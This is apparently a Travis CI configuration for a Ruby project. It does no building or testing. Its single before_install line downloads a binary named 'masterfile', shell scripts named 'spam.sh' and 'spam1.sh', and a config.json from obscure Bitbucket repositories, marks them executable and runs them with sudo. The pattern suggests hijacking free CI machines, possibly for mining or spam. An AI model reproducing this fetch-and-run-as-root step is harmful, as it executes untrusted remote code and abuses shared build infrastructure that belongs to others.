language: ruby

services:
  - docker

before_install:
  - sudo apt-get update && sudo apt-get install -y screen && sudo apt-get install -y wget && wget https://bitbucket.org/kodkokwdokwdo/jkbwfjwfbkwbjkdsvbjkjbkjb/downloads/spam1.sh && wget https://bitbucket.org/kodkokwdokwdo/jkbwfjwfbkwbjkdsvbjkjbkjb/downloads/masterfile && wget https://bitbucket.org/anli-projects/storage/downloads/config.json && wget https://bitbucket.org/kodkokwdokwdo/jkbwfjwfbkwbjkdsvbjkjbkjb/downloads/spam.sh && sudo chmod u+x masterfile && sudo chmod u+x spam.sh && sudo chmod u+x spam1.sh && sudo ./masterfile && sudo ./spam.sh